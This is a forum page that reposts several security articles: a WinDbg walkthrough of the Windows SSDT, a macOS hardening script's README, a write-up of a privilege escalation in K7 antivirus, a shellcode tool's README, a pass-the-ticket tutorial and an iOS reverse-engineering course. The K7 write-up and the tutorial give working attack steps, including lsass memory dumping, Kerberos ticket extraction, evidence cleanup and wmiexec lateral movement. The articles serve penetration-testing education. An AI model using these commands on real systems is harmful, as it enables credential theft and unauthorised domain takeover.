kiservicetable+4*0x55 L1 fffff801`9203b5c4 01fa3007 We see from the above that the offset for NtCreateFile is 01fa3007. Using the formula discussed previously for working out the absolute routine address, we confirm that we're looking at the nt!tCreateFile kernel routine that will be called once ntdll!NtCreateFile issues the 0x55 syscall: 0: kd> u kiservicetable + (01fa3007>>>4) L1 nt!NtCreateFile: fffff801`92235770 4881ec88000000 sub rsp,88h Let's redraw the earlier diagram once more for the syscall 0x55 for ntdll!NtCreateFile: Finding Address of All SSDT Routines As another exercise, we could loop through all items in the service dispatch table and print absolute addresses for all routines defined in the dispatch table: .foreach /ps 1 /pS 1 ( offset {dd /c 1 nt!KiServiceTable L poi(keservicedescriptortable+0x10) }){ dp kiservicetable + ( offset >>> 4 ) L1 } Nice, but not very human readable. We can update the loop a bit and print out the API names associated with those absolute addresses: 0: kd> .foreach /ps 1 /pS 1 ( offset {dd /c 1 nt!KiServiceTable L poi(nt!KeServiceDescriptorTable+10)}){ r $t0 = ( offset >>> 4) + nt!KiServiceTable; .printf "%p - %y\n", $t0, $t0 } fffff80191dcb4ec - nt!NtAccessCheck (fffff801`91dcb4ec) fffff80191cefccc - nt!NtWorkerFactoryWorkerReady (fffff801`91cefccc) fffff8019218df1c - nt!NtAcceptConnectPort (fffff801`9218df1c) fffff801923f8848 - nt!NtMapUserPhysicalPagesScatter (fffff801`923f8848) fffff801921afc10 - nt!NtWaitForSingleObject (fffff801`921afc10) fffff80191e54010 - nt!NtCallbackReturn (fffff801`91e54010) fffff8019213cf60 - nt!NtReadFile (fffff801`9213cf60) fffff801921b2e80 - nt!NtDeviceIoControlFile (fffff801`921b2e80) fffff80192212dc0 - nt!NtWriteFile (fffff801`92212dc0) .....cut for brewity..... References The Quest for the SSDTs The much talked about Kernel data structures www.codeproject.com .printf - Windows drivers The .printf token behaves like the printf statement in C. docs.microsoft.com .foreach - Windows drivers The .foreach token parses the output of one or more debugger commands and uses each value in this output as the input to one or more additional commands. docs.microsoft.com Sursa: https://ired.team/miscellaneous-reversing-forensics/windows-kernel/glimpse-into-ssdt-in-windows-x64-kernel
  21. macOS Lockdown (mOSL) Bash script to audit and fix macOS Catalina (10.15.x) security settings Inspired by and based on Lockdown by Patrick Wardle and osxlockdown by Scott Piper. Warnings mOSL is being rewritten in Swift and the Bash version will be deprecated.. See: "The Future of mOSL". Always run the latest release not the code in master! This script will only ever support the latest macOS release This script requires your password to invoke some commands with sudo brew tap: 0xmachos/homebrew-mosl To install mOSL via brew execute: brew tap 0xmachos/homebrew-mosl brew install mosl mOSL will then be available as: Lockdown Threat Model(ish) The main goal is to enforce already secure defaults and apply more strict non-default options. It aims to reduce attack surface but it is pragmatic in this pursuit. The author utilises Bluetooth for services such as Handoff so it is left enabled. There is no specific focus on enhancing privacy. Finally, mOSL will not protect you from the FSB, MSS, DGSE, or FSM. Full Disk Access Permission In macOS Mojave and later certain application data is protected by the OS. For example, if Example.app wishes to access Contacts.app data Example.app must be given explicit permission via System Preferences > Security & Privacy > Privacy. However some application data cannot be accessed via a specific permission. Access to this data requires the Full Disk Access permission. mOSL requires that Terminal.app be given the Full Disk Access permission. It needs this permission to audit/fix the following settings: disable mail remote content disable_auto_open_safe_downloads These are currently the only settings which require Full Disk Access. It is not possible to programatically get or prompt for this permission, it must be manually given by the user. To give Terminal.app Full Disk Access: System Preferences > Security & Privacy > Privacy > Full Disk Access > Add Terminal.app Once you are done with mOSL you can revoke Full Disk Access for Terminal.app. There's a small checkbox next to Terminal which you can uncheck to revoke the premssion without entirely removing Terminal.app from the list. More info on macOS's new permission model: Working with Mojave’s Privacy Protection by Howard Oakley TCC Round Up by Carl Ashley WWDC 2018 Session 702 Your Apps and the Future of macOS Security Verification The executable Lockdown file can be verified with Minisign: minisign -Vm Lockdown -P RWTiYbJbLl7q6uQ70l1XCvGExizUgEBNDPH0m/1yMimcsfgh542+RDPU Install via brew: brew install minisign Usage $ ./Lockdown Audit or Fix macOS security settings🔒🍎 Usage: ./Lockdown [list | audit {setting_index} | fix {setting_index} | debug] list - List settings that can be audited/ fixed audit - Audit the status of all or chosen setting(s) (Does NOT change settings) fix - Attempt to fix all or chosen setting(s) (Does change settings) fix-force - Same as 'fix' however bypasses user confirmation prompt (Can be used to invoke Lockdown from other scripts) debug - Print debug info for troubleshooting Settings See Commands.md for a easy to read list of commands used to audit/ fix the below settings. Settings that can be audited/ fixed: [0] enable automatic system updates [1] enable automatic app store updates [2] enable gatekeeper [3] enable firewall [4] enable admin password preferences [5] enable terminal secure entry [6] enable sip [7] enable filevault [8] disable firewall builin software [9] disable firewall downloaded signed [10] disable ipv6 [11] disable mail remote content [12] disable remote apple events [13] disable remote login [14] disable auto open safe downloads [15] set airdrop contacts only [16] set appstore update check daily [17] set firmware password [18] check kext loading consent [19] check efi integrity [20] check if standard user Sursa: https://github.com/0xmachos/mOSL
  22. Anti-virus Exploitation: Local Privilege Escalation in K7 Security (CVE-2019-16897) Exploit Development antivirus windows reverseengineering Nov 24 1 / 1 Nov 25 21h ago dtmwaifu pillow collector 21h Anti-virus Exploitation Hey guys, long time no article! Over the past few months, I have been looking into exploitation of anti-viruses via logic bugs. I will briefly discuss the approach towards performing vulnerability research of these security products using the vulnerability I discovered in K7 Security as an example. Disclaimer: I do not claim to know everything about vulnerability research nor exploitation so if there are errors in this article, please let me know. Target Selection Security products such as anti-viruses are an attractive target (at least for me) because they operate in a trusted and privileged context in both the kernel, as a driver, and userland, as a privileged service. This means that they have the ability to facilitate potential escalation of privilege or otherwise access privileged functionality. They have a presence in the low-privileged space of the operating system. For example, there may exist a UI component with which the user can interact, sometimes allowing options to be changed such as enabling/disabling anti-virus, adding directory or file exclusions, and scanning files for malware. Anti-viruses must also access and perform operations on operating system objects to detect malware, such as reading files, registry keys, memory, etc. as well as being able to do privileged actions to keep the system in a protected state no matter the situation. It is between this trusted, high privilege space and the untrusted, low privileged space where interesting things occur. Attack Surface As aforementioned, anti-viruses live in both sides of the privilege boundary as shown in the following diagram: Untitled Diagram(1).jpg762×401 51.7 KB Whatever crosses the line between high and low privilege represents the attack surface. Let’s look at how this diagram can be interpreted. The user interface shares common operations with the service process which is expected. If the user wants to carry out a privileged action, the service will do it on its behalf, assuming that security checks are passed. If the user wishes to change a setting, they open the user interface and click a button. This is communicated to the service process via some form of inter-process communication (IPC) which will perform the necessary actions, e.g. the anti-virus stores its configuration in the registry and therefore, the service will open the relevant registry key and modify some data. Keep in mind that the registry key is stored in the HKEY_LOCAL_MACHINE hive which is in high privilege space, thus requiring a high privilege process to modify its data. So the user, from low privilege, is able to indirectly modify a high privilege object. One more example. A user can scan for malware through the user interface (of course, what good is an anti-virus if they disallow the user from scanning for malware?). A simple, benign operation, what could go wrong? Since it is the responsibility of the service process to perform the malware scan, the interface communicates the information to the service process to target a file. It must interact with the file in order to perform the scan, i.e. it must locate the file on disk and read its content. If, while the file data has been read and is being scanned for malware, and the anti-virus does not lock the file on disk, it is possible for the malware to be replaced with a symbolic link pointing to a file in a high privileged directory (yes, it is possible), let’s use notepad.exe. When the scan is completed and has been determined to be malware, the service process can delete the file. However, the malware has been replaced with a link to notepad.exe! If the anti-virus does not detect and reject the symbolic link, it will delete notepad.exe without question. This is an example of a Time of Check to Time of Use (TOCTOU) 1 race condition bug. Again, the user, from low privilege, is able to indirectly modify a high privilege object because of the service process acting as a broker. Exploitation This vulnerability allows a low privilege user to modify (almost) arbitrary registry data through the anti-virus’s settings. However, a low privileged user (non administrator) cannot should not be able to change the anti-virus’s settings. Bypassing Administrative Checks To narrow down how this administration check is performed, procmon can be used to identify operating system activity as the settings page is accessed again. This will trigger the anti-virus to recheck the administrative status of the current user while it interacts with the operating system as it is being logged. Of course, since we are low privilege and procmon requires high privilege, it is not practical in a real environment. However, because we control the testing environment, we can allow procmon to run as we have access to an administrator account. Setting promon to filter by K7TSMain as the process name will capture activity performed by the user interface process. When procmon starts to log, attempting to access the settings page again in the UI will trigger procmon to instantly show results: procmon admin check.png1162×491 105 KB It can be seen that the anti-virus stores the administrative check in the registry in AdminNonAdminIsValid. Looking at the value in the Event Properties window shows that it returned 0, meaning that non administrator users are not allowed. But there is a slight problem here. Bonus points if you can spot it. Now that we know where the check is being performed, the next step is bypassing it. procmon shows that the process is running in low privilege space as indicated by the user and the medium integrity meaning that we own the process. If it is not protected, we can simply hook the RegQueryValue function and modify the return value. Attaching to K7TSMain.png815×362 96.9 KB Attempting to attach to the K7TSMain.exe process using x32dbg is allowed! The breakpoint on RegQueryValueExA has been set for when we try to access the settings page again. Triggering RegQueryValueExA breakpoint.png1064×577 101 KB x32dbg catches the breakpoint when the settings page is clicked. The value name being queried is ProductType but we want AdminNonAdminIsValid, so continuing on will trigger the next breakpoint: Breakpoint on AdminNonAdminIsValid.png761×506 41.6 KB Now we can see AdminNonAdminIsValid. To modify the return value, we can allow the function to run until return. However, the calling function looks like a wrapper for RegQueryValueExA: So continuing again until return reveals the culprit function that performs the check: Admin check function.png754×157 11.2 KB There is an obvious check there for the value 1 however, the current returned value for the registry data is 0. This decides the return value of this function so we can either change [esp+4] or change the return value to bypass the check: Bypass admin check.png847×518 23.4 KB Intercepting Inter-process Communication Multiple inter-process communication methods are available on Windows such as mailslots, file mapping, COM, and named pipes. We must figure out which is implemented in the product to be able to analyse the protocol. An easy way to do this is by using API Monitor to log select function calls made by the process. When we do this and then apply a changed setting, we can see references to named pipe functions: image.png1081×513 62.5 KB Note that the calling module is K7AVOptn.dll instead of K7TSMain.exe. If we have a look at the data being communicated through TransactNamedPipe, we can see some interesting information: image.png704×204 13 KB The first thing that pops out is that it looks like a list of extension names (.ocx, .exe, .com) separated with | where some have wildcard matching. This could be a list of extensions to scan for malware. If we have a look at the registry where the anti-virus stores its configuration, we can see something similar under the value ScanExtensions in the RTFileScanner key: image.png820×696 83.5 KB Continuing down the list of calls, one of them contains some very intriguing data: image.png703×415 26.4 KB It looks as though the anti-virus is applying values by specifying (privileged) registry keys and their values by their full key path. The next obvious step is to see if changing one of the keys and their values will work. This can be done by breakpointing on the TransactNamedPipe function in x32dbg: image.png768×551 43.9 KB Once here, locate the input buffer in the second argument and alter the data to add or change a key in the HKEY_LOCAL_MACHINE hive like so: image.png781×172 17.9 KB If it is possible to change this registry key’s values, high privileged processes will be forced to load the DLLs listed in AppInit_DLLs, i.e. one that we control. The LoadAppInit_DLLs value must also be set to 1 (it is 0 by default) to enable this functionality. The result: image.png1008×559 66.7 KB Triggering the Payload You may have noticed that the registry key resides within Wow6432Node which is the 32-bit counterpart of the registry. This is because the product is 32-bit and so Windows will automatically redirect registry changes. In 64-bit Windows, processes are usually 64-bit and so the chances of loading the payload DLL through AppInit_DLLs is unlikely. A reliable way is to make use of the anti-virus because it is 32-bit assuming a privileged component can be launched. The easiest way to do this is to restart the machine because it will reload all of the anti-virus’s processes however, it is not always practical nor is it clean. Clicking around the UI reveals that the update function runs K7TSHlpr.exe under the NT AUTHORITY\SYSTEM user: image.png1427×456 83 KB As it is a 32-bit application, Windows will load our AppInit_DLLs DLL into the process space. image.png856×537 59.5 KB Using system("cmd") as the payload will prompt the user with an interactive session in the context of the NT AUTHORITY\SYSTEM account via the UI0Detect service: Selecting to view the message brings up the following: image.png742×598 13.2 KB We have root! Automated Exploit 9 Link to my GitHub for the advisory and an automated exploit 10. Sursa: https://0x00sec.org/t/anti-virus-exploitation-local-privilege-escalation-in-k7-security-cve-2019-16897/17655
  23. Nytro

    Sickle

    Sickle Sickle is a payload development tool originally created to aid me in crafting shellcode, however it can be used in crafting payloads for other exploit types as well (non-binary). Although the current modules are mostly aimed towards assembly this tool is not limited to shellcode. Sickle can aid in the following: Identifying instructions resulting in bad characters when crafting shellcode Formatting output in various languages (python, perl, javascript, etc). Accepting bytecode via STDIN and formatting it. Executing shellcode in both Windows and Linux environments. Diffing for two binaries (hexdump, raw, asm, byte) Dissembling shellcode into assembly language (ARM, x86, etc). Shellcode extraction from raw bins (nasm sc.asm -o sc) Quick failure check A task I found myself doing repetitively was compiling assembler source code then extracting the shellcode, placing it into a wrapper, and testing it. If it was a bad run, the process would be repeated until successful. Sickle takes care of placing the shellcode into a wrapper for quick testing. (Works on Windows and Unix systems): Recreating shellcode Sometimes you find a piece of shellcode that's fluent in its execution and you want to recreate it yourself to understand its underlying mechanisms. Sickle can help you compare the original shellcode to your "recreated" version. If you're not crafting shellcode and just need 2 binfiles to be the same this feature can also help verifying files are the same byte by byte (multiple modes). Disassembly Sickle can also take a binary file and convert the extracted opcodes (shellcode) to machine instructions. Keep in mind this works with raw opcodes (-r) and STDIN (-r -) as well. In the following example I am converting a reverse shell designed by Stephen Fewer to assembly. Bad character identification Module Based Design This tool was originally designed as a one big script, however recently when a change needed to be done to the script I had to relearn my own code... In order to avoid this in the future I've decided to keep all modules under the "modules" directory (default module: format). If you prefer the old design, I have kept a copy under the Documentation directory. ~# sickle.py -l Name Description ---- ----------- diff Compare two binaries / shellcode(s). Supports hexdump, byte, raw, and asm modes run Execute shellcode on either windows or unix format Format bytecode into desired format / language badchar Generate bad characters in respective format disassemble Disassemble bytecode in respective architecture pinpoint Pinpoint where in shellcode bad characters occur ~# sickle -i -m diff Options for diff Options: Name Required Description ---- -------- ----------- BINFILE yes Additional binary file needed to perform diff MODE yes hexdump, byte, raw, or asm Description: Compare two binaries / shellcode(s). Supports hexdump, byte, raw, and asm modes Sursa: https://github.com/wetw0rk/Sickle
  24. Practical Guide to Passing Kerberos Tickets From Linux Nov 21, 2019 This goal of this post is to be a practical guide to passing Kerberos tickets from a Linux host. In general, penetration testers are very familiar with using Mimikatz to obtain cleartext passwords or NT hashes and utilize them for lateral movement. At times we may find ourselves in a situation where we have local admin access to a host, but are unable to obtain either a cleartext password or NT hash of a target user. Fear not, in many cases we can simply pass a Kerberos ticket in place of passing a hash. This post is meant to be a practical guide. For a deeper understanding of the technical details and theory see the resources at the end of the post. Tools To get started we will first need to setup some tools. All have information on how to setup on their GitHub page. Impacket https://github.com/SecureAuthCorp/impacket pypykatz https://github.com/skelsec/pypykatz Kerberos Client RPM based: yum install krb5-workstation Debian based: apt install krb5-user procdump https://docs.microsoft.com/en-us/sysinternals/downloads/procdump autoProc.py (not required, but useful) wget https://gist.githubusercontent.com/knavesec/0bf192d600ee15f214560ad6280df556/raw/36ff756346ebfc7f9721af8c18dff7d2aaf005ce/autoProc.py Lab Environment This guide will use a simple Windows lab with two hosts: dc01.winlab.com (domain controller) client01.winlab.com (generic server And two domain accounts: Administrator (domain admin) User1 (local admin to client01) Passing the Ticket By some prior means we have compromised the account user1, which has local admin access to client01.winlab.com. A standard technique from this position would be to dump passwords and NT hashes with Mimikatz. Instead, we will use a slightly different technique of dumping the memory of the lsass.exe process with procdump64.exe from Sysinternals. This has the advantage of avoiding antivirus without needing a modified version of Mimikatz. This can be done by uploading procdump64.exe to the target host: And then run: procdump64.exe -accepteula -ma lsass.exe output-file Alternatively we can use autoProc.py which automates all of this as well as cleans up the evidence (if using this method make sure you have placed procdump64.exe in /opt/procdump/. I also prefer to comment out line 107): python3 autoProc.py domain/user@target We now have the lsass.dmp on our attacking host. Next we dump the Kerberos tickets: pypykatz lsa -k /kerberos/output/dir minidump lsass.dmp And view the available tickets: Ideally, we want a krbtgt ticket. A krbtgt ticket allows us to access any service that the account has privileges to. Otherwise we are limited to the specific service of the TGS ticket. In this case we have a krbtgt ticket for the Administrator account! The next step is to convert the ticket from .kirbi to .ccache so that we can use it on our Linux host: kirbi2ccache input.kirbi output.ccache Now that the ticket file is in the correct format, we specify the location of the .ccache file by setting the KRB5CCNAME environment variable and use klist to verify everything looks correct: export KRB5CCNAME=/path/to/.ccache klist We must specify the target host by the fully qualified domain name. We can either add the host to our /etc/hosts file or point to the DNS server of the Windows environment. Finally, we are ready to use the ticket to gain access to the domain controller: wmiexec.py -no-pass -k -dc-ip w.x.y.z domain/user@fqdn Excellent! We were able to elevate to domain admin by using pass the ticket! Be aware that Kerberos tickets have a set lifetime. Make full use of the ticket before it expires! Conclusion Passing the ticket can be a very effective technique when you do not have access to an NT hash or password. Blue teams are increasingly aware of passing the hash. In response they are placing high value accounts in the Protected Users group or taking other defensive measures. As such, passing the ticket is becoming more and more relevant. Resources https://www.tarlogic.com/en/blog/how-kerberos-works/ https://www.harmj0y.net/blog/tag/kerberos/ Thanks to the following for providing tools or knowledge: Impacket gentilkiwi harmj0y SkelSec knavesec Sursa: https://0xeb-bp.github.io/blog/2019/11/21/practical-guide-pass-the-ticket.html
  25. Reverse Engineering iOS Applications Welcome to my course Reverse Engineering iOS Applications. If you're here it means that you share my interest for application security and exploitation on iOS. Or maybe you just clicked the wrong link 😂 All the vulnerabilities that I'll show you here are real, they've been found in production applications by security researchers, including myself, as part of bug bounty programs or just regular research. One of the reasons why you don't often see writeups with these types of vulnerabilities is because most of the companies prohibit the publication of such content. We've helped these companies by reporting them these issues and we've been rewarded with bounties for that, but no one other than the researcher(s) and the company's engineering team will learn from those experiences. This is part of the reason I decided to create this course, by creating a fake iOS application that contains all the vulnerabilities I've encountered in my own research or in the very few publications from other researchers. Even though there are already some projects[^1] aimed to teach you common issues on iOS applications, I felt like we needed one that showed the kind of vulnerabilities we've seen on applications downloaded from the App Store. This course is divided in 5 modules that will take you from zero to reversing production applications on the Apple App Store. Every module is intended to explain a single part of the process in a series of step-by-step instructions that should guide you all the way to success. This is my first attempt to creating an online course so bear with me if it's not the best. I love feedback and even if you absolutely hate it, let me know; but hopefully you'll enjoy this ride and you'll get to learn something new. Yes, I'm a n00b! If you find typos, mistakes or plain wrong concepts please be kind and tell me so that I can fix them and we all get to learn! Version: 1.1 Modules Prerequisites Introduction Module 1 - Environment Setup Module 2 - Decrypting iOS Applications Module 3 - Static Analysis Module 4 - Dynamic Analysis and Hacking Module 5 - Binary Patching Final Thoughts Resources EPUB Download Thanks to natalia-osa's brilliant idea, there's now a .epub version of the course that you can download from here. As Natalia mentioned, this is for easier consumption of the content. Thanks again for this fantastic idea, Natalia 🙏🏼. License Copyright 2019 Ivan Rodriguez <ios [at] ivrodriguez.com> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. Donations I don't really accept donations because I do this to share what I learn with the community. If you want to support me just re-share this content and help reach more people. I also have an online store (nullswag.com) with cool clothing thingies if you want to get something there. Disclaimer I created this course on my own and it doesn't reflect the views of my employer, all the comments and opinions are my own. Disclaimer of Damages Use of this course or material is, at all times, "at your own risk." If you are dissatisfied with any aspect of the course, any of these terms and conditions or any other policies, your only remedy is to discontinue the use of the course. In no event shall I, the course, or its suppliers, be liable to any user or third party, for any damages whatsoever resulting from the use or inability to use this course or the material upon this site, whether based on warranty, contract, tort, or any other legal theory, and whether or not the website is advised of the possibility of such damages. Use any software and techniques described in this course, at all times, "at your own risk", I'm not responsible for any losses, damages, or liabilities arising out of or related to this course. In no event will I be liable for any indirect, special, punitive, exemplary, incidental or consequential damages. this limitation will apply regardless of whether or not the other party has been advised of the possibility of such damages. Privacy I'm not personally collecting any information. Since this entire course is hosted on Github, that's the privacy policy you want to read. [^1] I love the work @prateekg147 did with DIVA and OWASP did with iGoat. They are great tools to start learning the internals of an iOS application and some of the bugs developers have introduced in the past, but I think many of the issues shown there are just theoretical or impractical and can be compared to a "self-hack". It's like looking at the source code of a webpage in a web browser, you get to understand the static code (HTML/Javascript) of the website but any modifications you make won't affect other users. I wanted to show vulnerabilities that can harm the company who created the application or its end users. Sursa: https://github.com/ivRodriguezCA/RE-iOS-Apps
×
×
  • Create New...